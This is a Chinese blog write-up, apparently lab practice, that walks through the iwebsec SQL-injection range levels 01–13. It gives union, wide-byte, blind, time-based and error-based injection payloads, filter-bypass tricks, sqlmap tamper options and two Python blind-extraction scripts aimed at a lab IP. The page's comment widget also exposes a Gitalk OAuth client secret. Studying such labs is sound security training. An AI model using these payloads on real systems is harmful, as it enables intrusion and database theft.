<!DOCTYPE html>
<html lang="zh-Hans" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="YSec" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  <meta name="description" content="与YSec共同进步" />
  
  
  
  <title>
    
      iwebsec_SQL 
      
      
      |
    
     YSec
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.1.1"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">YSec</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">iwebsec_SQL</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2024-04-14 19:45:06
        </span>
        
      </div>
      <div class="markdown-body">
        <h4 id="01-数字型注入"><a href="#01-数字型注入" class="headerlink" title="01-数字型注入"></a>01-数字型注入</h4><p><code>?id=2 order by 3</code></p>
<p><code>?id=2 union select 1,2,3--+</code></p>
<p>发现1，2，3位置均有回显且无过滤，正常进行注入即可</p>
<h4 id="02-字符型注入"><a href="#02-字符型注入" class="headerlink" title="02-字符型注入"></a>02-字符型注入</h4><p>先判断闭合，无论是但还是双都是正常执行查询语句，无法执行注入语句，首先考虑单双引号是否被转义，即转为 &#x2F;‘ 的形式，对于转义可以采用宽字节注入，原理为 &#x2F; 的编码为%5c，可以在前面使用 %df 将 %5c “吃掉”，%df%5c 会被编码为 <strong>運</strong> </p>
<p><code>?id=1%df&#39; union select 1,2,3--+</code> </p>
<p>经过转义后变成<code>?id=1%df/&#39; union select 1,2,3--+</code></p>
<p>再经过编码解释变为<code>?id=1運&#39; union select 1,2,3--+</code> 即可进行正常注入</p>
<p><code>?id=1%df&#39; union select 1,2,group_concat(column_name)from information_schema.columns where table_name = 0x73716c69--+</code>无论输入&#96;&#96;还是’’都会被转义，所以直接使用十六进制就行</p>
<h4 id="03-布尔注入"><a href="#03-布尔注入" class="headerlink" title="03-布尔注入"></a>03-布尔注入</h4><p><code>?id=1 order by 3--+</code></p>
<p><code>?id=1 and 1=1--+</code> 和 <code>?id=1 and 1=0--+</code>  确定没有闭合</p>
<p>直接动手写代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://http://192.168.2.36/sqli/03.php?id=&quot;</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;select group_concat(table_name) from information_schema.tables where table_schema=database()&quot;</span></span><br><span class="line">res = <span class="string">&quot;&quot;</span></span><br><span class="line">i = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    i = i + <span class="number">1</span></span><br><span class="line">    start = <span class="number">32</span></span><br><span class="line">    end = <span class="number">127</span></span><br><span class="line">    <span class="keyword">while</span> start &lt; end:</span><br><span class="line">        mid = (start + end) &gt;&gt; <span class="number">1</span></span><br><span class="line">        param = <span class="string">f&quot;1 and (ascii(substr((<span class="subst">&#123;payload&#125;</span>),<span class="subst">&#123;i&#125;</span>,1))&gt;<span class="subst">&#123;mid&#125;</span>)#&quot;</span></span><br><span class="line">        r = requests.get(url+param)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;welcome to iwebsec!!!&#x27;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            end = mid</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            start = mid + <span class="number">1</span></span><br><span class="line">    <span class="keyword">if</span> start != <span class="number">32</span>:</span><br><span class="line">        res = res + <span class="built_in">chr</span>(start)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(res)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>当然，我们可以使用SQLmap进行注入：</p>
<p><code>python sqlmap.py -u ... --dbs --dump</code></p>
<h4 id="04-sleep注入"><a href="#04-sleep注入" class="headerlink" title="04-sleep注入"></a>04-sleep注入</h4><p><code>?id=1 and if(1=1,sleep(5),2)--+</code></p>
<p>直接上代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://192.168.2.36/sqli/04.php?id=&quot;</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;select group_concat(table_name) from information_schema.tables where table_schema=database()&quot;</span></span><br><span class="line">res = <span class="string">&quot;&quot;</span></span><br><span class="line">i = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    i = i + <span class="number">1</span></span><br><span class="line">    start = <span class="number">32</span></span><br><span class="line">    end = <span class="number">127</span></span><br><span class="line">    <span class="keyword">while</span> start &lt; end:</span><br><span class="line">        mid = (start + end) &gt;&gt; <span class="number">1</span></span><br><span class="line">        params = &#123;</span><br><span class="line">            <span class="string">&#x27;id&#x27;</span>: <span class="string">f&quot;1 and if(ascii(substr((<span class="subst">&#123;payload&#125;</span>),<span class="subst">&#123;i&#125;</span>,1))&gt;<span class="subst">&#123;mid&#125;</span>,sleep(1),1)&quot;</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            r = requests.get(url, params=params, timeout=<span class="number">0.5</span>)</span><br><span class="line">            end = mid</span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            start = mid + <span class="number">1</span></span><br><span class="line">    <span class="keyword">if</span> start != <span class="number">32</span>:</span><br><span class="line">        res = res + <span class="built_in">chr</span>(start)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(res)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>SQLmap:</p>
<p><code>python sqlmap.py -u ... --dbs --dump</code></p>
<h4 id="05-updatexml报错注入"><a href="#05-updatexml报错注入" class="headerlink" title="05-updatexml报错注入"></a>05-updatexml报错注入</h4><p><code>?id=1 and 1= updatexml(1,concat(0x7e,(select database())),3)--+</code></p>
<p><code>database()</code>改为:</p>
<p><code>group_concat(table_name)from information_schema.tables where table_schema=database()</code></p>
<p>SQLmap处理这种简单的注入都是用同样的命令就行</p>
<h4 id="06-宽字节注入"><a href="#06-宽字节注入" class="headerlink" title="06-宽字节注入"></a>06-宽字节注入</h4><p>原理和第二题是一样的</p>
<p><code>?id=1%df&#39;union select 1,2,3--+</code></p>
<p>剩下的为所欲为了，注意需要引号的地方使用十六进制即可</p>
<h4 id="07-空格过滤绕过"><a href="#07-空格过滤绕过" class="headerlink" title="07-空格过滤绕过"></a>07-空格过滤绕过</h4><p>当出现空格时就会回显<code>ERROR</code>，所以不能出现空格，注释不能再是<code>--+</code>，因为<code>--+  =  --空格</code>，需要使用<code>#</code></p>
<p>空格可以使用*%0a %0b %0c*去替代，还有很多，自行搜集</p>
<p><code>?id=0%0aunion%0aselect%0a1,2,3#</code></p>
<p>为什么这里需要用id&#x3D;0呢，因为使用id&#x3D;1的时候只回显了id&#x3D;1的用户信息而没有回显我们的联合查询信息，猜测是源码使用了<code>limit</code>导致只回显一行，所以使用<code>id = 0</code>没结果，就会返回联合查询的内容了</p>
<p>SQLmap:</p>
<p><code>--tamper=space2randomblank</code></p>
<h4 id="08-大小写过滤绕过"><a href="#08-大小写过滤绕过" class="headerlink" title="08-大小写过滤绕过"></a>08-大小写过滤绕过</h4><p><code>?id=1 union select 1,2,3--+</code>报错</p>
<p><code>?id=1 Union sElect 1,2,3--+</code>成功</p>
<p>SQLmap：直接就行</p>
<h4 id="09-双写关键字绕过"><a href="#09-双写关键字绕过" class="headerlink" title="09-双写关键字绕过"></a>09-双写关键字绕过</h4><p><code>?id=0 ununionion seselectlect 1,2,3--+</code></p>
<img src="/pic/image-20240414171646191.png" alt="result09" style="zoom:80%;" />

<p>可以看到union没被过滤</p>
<p><code>?id=0 union seselectlect 1,2,3--+</code></p>
<p>接着为所欲为去吧</p>
<p>SQLmap中自己写一个脚本把select替换就行</p>
<h4 id="10-双重URL编码绕过"><a href="#10-双重URL编码绕过" class="headerlink" title="10-双重URL编码绕过"></a>10-双重URL编码绕过</h4><p><code>?id=0 union select 1,2,3--+</code>回显ERROR</p>
<p>将<code>union select</code>进行二次url编码再放回上面payload即可</p>
<p>二次url编码脚本（by 我自己，写得烂）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">encode_to_hex</span>(<span class="params">input_str</span>):</span><br><span class="line">    encoded_chars = []</span><br><span class="line">    <span class="keyword">for</span> char <span class="keyword">in</span> input_str:</span><br><span class="line">        <span class="comment"># 想用什么开头就把%改掉就行</span></span><br><span class="line">        encoded_chars.append(<span class="string">&quot;%&quot;</span> + char.encode(<span class="string">&#x27;utf-8&#x27;</span>).<span class="built_in">hex</span>())</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>.join(encoded_chars)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">input_str = <span class="string">&quot;union select&quot;</span></span><br><span class="line">encoded_str = encode_to_hex(encode_to_hex(input_str))</span><br><span class="line"><span class="built_in">print</span>(encoded_str)</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h4 id="11-十六进制绕过"><a href="#11-十六进制绕过" class="headerlink" title="11-十六进制绕过"></a>11-十六进制绕过</h4><p><code>?id=1 union select 1,2,3--+</code></p>
<p><code>group_concat(column_name) from information_schema.columns where table_name = &#39;user&#39;--+</code></p>
<img src="/pic/image-20240414185154400.png" alt="result11" style="zoom:80%;" />

<p>这个十六进制编码就好</p>
<h4 id="12-等价函数替换过滤"><a href="#12-等价函数替换过滤" class="headerlink" title="12-等价函数替换过滤"></a>12-等价函数替换过滤</h4><p><code>?id=1 union select 1,2,3--+</code></p>
<p><code>group_concat(table_name) from information_schema.tables where table_schema = database()</code>报错</p>
<p>排查，最后发现是<code>=</code>被过滤，使用<code>like</code>替代</p>
<p><code>group_concat(table_name) from information_schema.tables where table_schema like &#39;iwebsec&#39;</code></p>
<p>SQLmap:</p>
<p><code>--tamper=equaltolike</code></p>
<h4 id="13-二次注入"><a href="#13-二次注入" class="headerlink" title="13-二次注入"></a>13-二次注入</h4><p>直接看大佬的分析吧</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/mooyuan/article/details/128048300">iwebsec靶场 SQL注入漏洞通关笔记13-二次注入_iwebsec二次注入-CSDN博客</a></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2024-04-14 19:45:06
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2024/04/15/iwebsec_upload/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#01-%E6%95%B0%E5%AD%97%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-text">01-数字型注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#02-%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-text">02-字符型注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#03-%E5%B8%83%E5%B0%94%E6%B3%A8%E5%85%A5"><span class="toc-text">03-布尔注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#04-sleep%E6%B3%A8%E5%85%A5"><span class="toc-text">04-sleep注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#05-updatexml%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="toc-text">05-updatexml报错注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#06-%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="toc-text">06-宽字节注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#07-%E7%A9%BA%E6%A0%BC%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="toc-text">07-空格过滤绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#08-%E5%A4%A7%E5%B0%8F%E5%86%99%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="toc-text">08-大小写过滤绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#09-%E5%8F%8C%E5%86%99%E5%85%B3%E9%94%AE%E5%AD%97%E7%BB%95%E8%BF%87"><span class="toc-text">09-双写关键字绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#10-%E5%8F%8C%E9%87%8DURL%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="toc-text">10-双重URL编码绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#11-%E5%8D%81%E5%85%AD%E8%BF%9B%E5%88%B6%E7%BB%95%E8%BF%87"><span class="toc-text">11-十六进制绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#12-%E7%AD%89%E4%BB%B7%E5%87%BD%E6%95%B0%E6%9B%BF%E6%8D%A2%E8%BF%87%E6%BB%A4"><span class="toc-text">12-等价函数替换过滤</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#13-%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5"><span class="toc-text">13-二次注入</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        






  <div id="gitalk-container"></div>

  <script>
    function loadGitalkSuc() {
      const gitalk = new Gitalk({
        clientID: 'Ov23licpPbk56RG2QlZ9',
        clientSecret: '8c17dc4d2de10cbb8846fbd6a9276cc3dc42f9e9',
        repo: 'Yllxx03.github.io',
        owner: 'Yllxx03',
        admin: ['Yllxx03'],
        id: location.pathname,
        distractionFreeMode: false
      })

      gitalk.render('gitalk-container')
    }
  </script>
  
    <link rel="stylesheet" href="/plugins/gitalk.css">
    <script type="text/javascript" src="/plugins/gitalk.min.js" onload="loadGitalkSuc(this)"></script>
  



      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2024 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + iwebsec_SQL + '&url=' + http%3A%2F%2Flxy00.top%2F2024%2F04%2F14%2Fiwebsec_sql%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://lxy00.top/2024/04/14/iwebsec_sql/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
